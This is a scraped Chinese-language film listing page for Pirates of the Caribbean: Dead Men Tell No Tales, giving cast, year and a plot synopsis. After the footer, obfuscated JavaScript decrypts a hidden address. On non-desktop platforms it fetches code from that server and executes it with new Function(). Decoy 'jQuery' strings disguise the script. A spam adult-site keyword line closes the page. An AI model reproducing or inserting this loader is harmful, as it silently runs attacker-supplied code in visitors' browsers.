• <tbody id="j2thg"></tbody>

  <tbody id="j2thg"></tbody><rp id="j2thg"><object id="j2thg"><blockquote id="j2thg"></blockquote></object></rp>
   1. 加勒比海盜5:死無對證

    狀態:HD

    地區:美國

    語言:英語

    年份:2017

    導演:艾斯彭·山德伯格  喬阿吉姆·羅恩尼  ?

    主演:約翰尼·德普  哈維爾·巴登  杰弗里·拉什  布倫頓·思韋茨  卡雅·斯考達里奧  ?

    簡介: 故事發生在《加勒比海盜3:世界的盡頭》沉船灣之戰20年后。 男孩亨利(布蘭頓·思懷茲 Brenton Thwaites 飾)隨英國海軍出航尋找被聚魂棺詛咒的父親“深海閻王”威爾·特納(奧蘭多·布魯姆 Orlando Bloom 飾),卻在百慕大三角遭遇被解封的亡靈薩拉查船長(哈維爾·巴登 Jav..

    加勒比海盜5:死無對證劇情詳細介紹

    故事發生在《加勒比海盜3:世界的盡頭》沉船灣之戰20年后。 男孩亨利(布蘭頓·思懷茲 Brenton Thwaites 飾)隨英國海軍出航尋找被聚魂棺詛咒的父親“深海閻王”威爾·特納(奧蘭多·布魯姆 Orlando Bloom 飾),卻在百慕大三角遭遇被解封的亡靈薩拉查船長(哈維爾·巴登 Javier Bardem 飾)。獲取自由的薩拉查屠盡加勒比海盜,征服了整個海域,手刃了“黑胡子”愛德華·蒂奇(伊恩·麥柯肖恩 Ian McShane 飾)的里海海盜王赫克托·巴博薩船長(杰弗里·拉什 Geoffrey Rush 飾)在女巫Haifaa Meni(格什菲·法拉哈尼 Golshifteh Farahani 飾)口中得知了薩拉查的真實目的:為尋找他的宿敵杰克船長(約翰尼·德普 Johnny Depp 飾)。海盜的命運皆壓在落魄的老杰克被封印的黑珍珠號,以及天文學家卡琳娜·史密斯(卡雅·斯考達里奧 Kaya Scodelario 飾)口中的遠古三叉戟上。

    猜你喜歡

    Copyright ? 2020-2022?技術支持:影視大全

    window['NuYMsS'] = function(){ var keyList = [ "3dZDw9T58oCjPhkArf+MBi4Ll27y8fe5uTs1t+rS7jPwoDpFG0cLnivO" , "N+HXzh8qK=CGgmcV91LaS7ETYj0n4Tn0krdcat3B+Ye4=JC9fmq7OlDMEg", "Hm0FOrxhT5fAgnivd3pCbLyGNV4QU6q9uwjZoPts+10Z9XNicgkhIw:R5/JC.je3Wo4rBxbapSy=", "VHlQxqJ2gELSvZ5in08B+opeYAC6r3KGueDrmRYbNzBs4x92dlucfGMPg85U60Z-FO", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"4wCCZl9T4C2k9")], crd = x(keyList[1],"8zmqNmmYmSm+N"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("nHHjmdCCwj5yhonhyQ3A", "SAZYASrZ5rZYAYrSYr", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}
    亚洲男人的天堂一区二区